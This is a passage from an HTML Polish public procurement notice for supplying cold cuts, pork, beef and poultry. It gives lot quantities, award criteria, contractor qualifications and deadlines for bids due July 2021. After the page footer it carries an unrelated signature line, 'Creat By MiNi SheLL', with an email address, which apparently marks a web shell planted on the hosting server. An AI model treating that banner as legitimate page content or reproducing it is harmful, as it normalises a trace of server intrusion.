class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Lp	Produkt	j.m. Ilość gwarantowana	Ilość opcjonalna<br/>1	baleron	kg	77	33<br/>3	kaszanka	Kg	700	300<br/>4	kiełbasa biała parzona	kg	140	60<br/>5	kiełbasa drobiowa	kg	140	60<br/>6	kiełbasa krakowska	kg	140	60<br/>7	kiełbasa mortadela wieprzowa	kg	560	240<br/>8	kiełbasa parówkowa	kg	350	150<br/>9	kiełbasa staropolska	kg	154	66<br/>10	kiełbasa szynkowa	kg	126	54<br/>11	kiełbasa zwyczajna	kg	1120	480<br/>12	kiełbaski debreczyńskie	kg	154	66<br/>13	luncheon	kg	490	210<br/>14	mielonka drobiowa	kg	490	210<br/>15	mielonka konserwowa	kg	490	210<br/>16	mielonka tłuszczowa	kg	490	210<br/>17	mielonka tyrolska	kg	280	120<br/>18	mortadela drobiowa	kg	350	150<br/>19	pachwina wędzona	kg	175	75<br/>20	parówki cienkie	kg	420	180<br/>21	parówki drobiowe	kg	210	90<br/>22	pasztet drobiowy	kg	154	66<br/>23	pasztet mięsny	kg	<br/>490	<br/>210<br/>24	pasztetowa kg	490	210<br/>25	pieczeń rzymska	kg	490	210<br/>26	podgardle wędzone	kg	210	90<br/>27	polędwica drobiowa	kg	126	54<br/>28	przysmak śniadaniowy	kg	525	225<br/>29	rolada drobiowa	kg	175	75<br/>30	salceson chłopski	kg	315	135<br/>31	salceson czarny	kg	315	135<br/>32	smalec	kg	210	90<br/>33	szynka drobiowa	kg	126	54<br/>34	szynka mielona	kg	126	54<br/>35	szynka miodowa	kg	140	60<br/>36	szynka z łopatki	kg	77	33<br/>37	szynka konserwowa	kg	77	33 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15131130-5 - Wędliny</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Po wyczerpaniu zamówienia gwarantowanego Zamawiający rozpocznie realizację zamówieni opcjonalnego przedmiotu zamówienia w ilościach podanych w rozdziale IV SWZ <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Zamawiający oceni i porówna jedynie te oferty, które: zostaną złożone przez Wykonawców nie wykluczonych przez Zamawiajacego, oraz nie zostaną odrzucone<br/>2) ofertą najkorzystniejszą będzie oferta Wykonawcy, który oprócz spełnienia warunków formalnych przedłoży najkorzystniejszą ofertę uzyskującą w klasyfikacji punktowej najwyższy bilans punktowy kryteriów wyboru oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> L.p.	Produkt	j.m. Ilość gwrantowana	Ilość opcjonalna<br/>1	mięso garmażeryjne wieprzowe	kg	210	90<br/>2	mięso wieprzowe kl. 2A	kg	245	105<br/>3	mięso wołowe kl. 2	kg	140	60<br/>4	schab wieprzowy bez kości	kg	112	48<br/>5	serca wieprzowe	kg	140	60<br/>6	słonina	kg	175	75<br/>7	wątroba wieprzowa	kg	420	180<br/>8	wieprzowina mrożona kl. 2A	kg	560	240<br/>9	wołowina mrożona kl. 2	kg	140	60<br/>1	korpusy z kurczaka	kg	245	105<br/>2	kurczaki	kg	140	60<br/>3	piersi z kurczaka	kg	84	36<br/>4	skrzydła z kurczaka	kg	315	135<br/>5	uda z kurczaka kg	840	360<br/>6	serca drobiowe	kg	245	105<br/>7	żołądki drobiowe	kg	245	105 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15131400-9 - Produkty wieprzowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15112000-6 - Drób</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Po wyczerpaniu zamówienia gwarantowanego Zamawiający rozpocznie realizację zamówieni opcjonalnego przedmiotu zamówienia w ilościach podanych w rozdziale IV SWZ <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Zamawiający oceni i porówna jedynie te oferty, które: zostaną złożone przez Wykonawców nie wykluczonych przez Zamawiajacego, oraz nie zostaną odrzucone<br/>2) ofertą najkorzystniejszą będzie oferta Wykonawcy, który oprócz spełnienia warunków formalnych przedłoży najkorzystniejszą ofertę uzyskującą w klasyfikacji punktowej najwyższy bilans punktowy kryteriów wyboru oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu oraz spełniają poniższe warunki udziału w postępowaniu:<br/>1)	Wykonawca spełni warunek zdolności do występowania w obrocie gospodarczym, jeżeli: <br/>Wykonawca spełni warunek jeżeli figuruje w odpowiednim rejestrze zawodowym lub handlowym; <br/>2)	Wykonawca spełni warunek posiadania kompetencji lub uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeżeli: <br/>	Zamawiający nie wyznacza warunku w tym zakresie;<br/>3) Wykonawca spełni warunek udziału w postępowaniu dotyczący sytuacji ekonomicznej lub finansowej, jeżeli wykaże, że:<br/>Zamawiający nie wyznacza warunku w tym zakresie;<br/>4)	Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności technicznej lub zawodowej jeżeli wykaże, że:<br/> Zamawiający nie wyznacza warunku w tym zakresie<br/> 2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy. <br/>3. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, <br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy <br/>w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ <br/>na realizację zamówienia.<br/>	4. Informacja dla wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>1)	wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich <br/>w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty;<br/>2)	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w ust. 1 składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>3)	wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty dostawy wykonają poszczególni wykonawcy;<br/>4)	oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z wykonawców wspólnie ubiegających się o zamówienie.<br/>5. Podwykonawstwo.<br/>1)	wykonawca może powierzyć wykonanie części zamówienia podwykonawcy (podwykonawcom);<br/>2)	zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych części zamówienia;<br/>3)	zamawiający wymaga, aby w przypadku powierzenia części zamówienia podwykonawcom, wykonawca wskazał w ofercie części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podał (o ile są mu wiadome na tym etapie) nazwy (firmy) tych podwykonawców. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) oświadczenia dotyczące braku podstaw do wykluczenia z postępowania - zgodnie z załącznikiem nr 2 do SWZ;</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Cena na poszczególny asortyment wymieniony w § 1 ust. 1 umowy może ulec zmianie w przypadku zmiany obowiązującej w dniu podpisania umowy stawki podatku VAT. Zmiana ceny wymaga formy pisemnej w postaci aneksu do umowy podpisanego przez Wykonawcę i Zamawiającego, dokonana zostanie na wniosek Wykonawcy. Zmiana dotyczy różnicy w stawce podatku VAT.<br/>2.	Zamawiający zastrzega sobie prawo zmiany ilości zamówionych towarów oraz asortymentu w poszczególnych grupach do kwoty wysokości umowy – podstawą zmiany będzie podpisany aneks przez Zamawiającego i Wykonawcę, zmiana zostanie dokonana na wniosek Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">htttps://platformazakupowa.pl/pn/zk_zytkowice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-07 10:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-04</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-30 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com